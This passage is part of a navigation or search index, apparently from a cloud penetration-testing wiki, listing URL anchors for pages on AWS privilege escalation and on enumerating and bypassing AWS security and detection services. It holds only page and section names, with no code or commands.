masteruserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdaterelationaldatabase","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailopeninstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailputinstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailsetresourceaccessforbucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatebucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatecontainerservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#aws---macie-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#macie","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#amazon-macie---bypass-reveal-sample-integrity-check","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#aws---mediapackage-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotatechannelcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotateingestendpointcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#aws---mq-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mq","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqcreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqlistusers-mqupdateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqupdatebroker","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#aws---msk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msklistclusters-mskupdatesecurity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#aws---rds-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds---relational-database-service","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsmodifydbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds-dbconnect","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#abuse-rds-role-iam-permissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbcluster-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#aws---redshift-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentialswithiam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftmodifycluster","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#accessing-external-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#lambdas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#dynamo","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#aws---route53-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#route53createhostedzone-route53changeresourcerecordsets-acm-pcaissuecertificate-acm-pcagetcertificate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#aws---sns-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#sns","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snspublish","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snssubscribe","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#aws---sqs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws---sso--identitystore-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws-identity-center--aws-sso","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#reset-password","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#identitystorecreategroupmembership","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoputinlinepolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachmanagedpolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachcustomermanagedpolicyreferencetopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssocreateaccountassignment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssogetrolecredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachmanagedpolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachcustomermanagedpolicyreferencefrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeleteinlinepolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeletepermissionboundaryfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#aws---organizations-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#organizations","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#from-management-account-to-children-accounts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#aws---s3-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketnotification-s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject-optional-over-terraform-state-file","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getbucketacl-s3putbucketacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectversionacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc-1","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#iampassrole--sagemakercreatenotebookinstance-sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreateprocessingjobiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatetrainingjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatehyperparametertuningjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#aws---secrets-manager-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secrets-manager","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetsecretvalue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetresourcepolicy-secretsmanagerputresourcepolicy-secretsmanagerlistsecrets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#aws---ssm-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmsendcommand","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmresumesession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmdescribeparameters-ssmgetparameter--ssmgetparameters","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmgetcommandinvocation-ssmlistcommandinvocations--ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#using-ssmcreateassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#aws---step-functions-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#step-functions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#task-resources","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesteststate--iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statescreatestatemachine--iampassrole--statesstartexecution--statesstartsyncexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesupdatestatemachine--not-always-required-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#aws---sts-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#sts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsgetfederationtoken","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithsaml","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithwebidentity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#federation-abuse","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#iam-roles-anywhere-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#aws---workdocs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocscreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsgetdocument-workdocsdescribeactivities","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddresourcepermissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddusertogroup","pentesting-cloud/aws-security/aws-services/index.html#aws---services","pentesting-cloud/aws-security/aws-services/index.html#types-of-services","pentesting-cloud/aws-security/aws-services/index.html#container-services","pentesting-cloud/aws-security/aws-services/index.html#abstract-services","pentesting-cloud/aws-security/aws-services/index.html#services-enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/index.html#aws---security--detection-services","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aws---cloudtrail-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aggregate-logs-from-multiple-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-from-all-org-accounts-into-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#log-files-checking","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#logs-to-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#event-history","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#insights","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#security","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#access-advisor","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#actions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#csv-injection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#honeytokens--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#accessing-third-infrastructure","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#modifying-cloudtrail-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#modifying-bucket-configuration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-ransomware","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#aws---cloudwatch-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#namespaces","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metrics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dimensions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#statistics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#units","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metric-stream-and-metric-data","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#alarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#anomaly-detectors","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#insight-rules-and-managed-insight-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-logs","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-monitoring--events","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#agent-installation","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmscloudwatchputmetricalarm--cloudwatchputcompositealarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmactions-cloudwatchenablealarmactions--cloudwatchsetalarmstate","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteanomalydetector-cloudwatchputanomalydetector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletedashboards-cloudwatchputdashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteinsightrules-cloudwatchputinsightrule-cloudwatchputmanagedinsightrule","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdisableinsightrules-cloudwatchenableinsightrules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletemetricstream--cloudwatchputmetricstream--cloudwatchputmetricdata","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchstopmetricstreams-cloudwatchstartmetricstreams","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchtagresource-cloudwatchuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws---config-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#functioning","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#config-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#aws---control-tower-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#control-tower","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#post-exploitation--persistence","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#aws---cost-explorer-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#cost-explorer-and-anomaly-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#budgets","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#aws---detective-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#detective","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#aws---firewall-manager-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#firewall-manager","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#prerequisites","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#types-of-protection-policies","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#administrator-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#post-exploitation--bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#organizationsdescribeorganization--fmsassociateadminaccount-fmsdisassociateadminaccount-fmsputadminaccount","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputpolicy-fmsdeletepolicy","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsbatchassociateresource-fmsbatchdisassociateresource-fmsputresourceset-fmsdeleteresourceset","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputappslist-fmsdeleteappslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputprotocolslist-fmsdeleteprotocolslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputnotificationchannel-fmsdeletenotificationchannel","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsassociatethirdpartyfirewall-fmsdisssociatethirdpartyfirewall","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmstagresource-fmsuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#aws---guardduty-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#findings-example","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#all-findings","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#multi-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty-bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#general-guidance","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#breaking-guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#specific-findings-bypass-examples","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#inspector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-elements","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#aws---security-hub-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#security-hub","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#aws---shield-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#shield","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---trusted-advisor-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws-trusted-advisor-overview","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#notifications-and-data-refresh","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#checks-breakdown","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws-waf","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#aws---api-gateway-enum","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateways-types","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway-main-components","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#logging","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#different-authorizations-to-access-api-gateway-endpoints","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#resource-policy","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#iam-authorizer","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#request-signing-using-python","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#custom-lambda-authorizer","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#required-api-key","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#aws---certificate-manager-acm--private-certificate-authority-pca","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#acm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#pcm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#privesc","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#aws---cloudformation--codestar-enum","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#cloudformation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#codestar","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#aws---cloudhsm-enum","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#hsm---hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#cloudhsm-suggestions","pentesting-cloud/aws-security/aws-services/aws-clo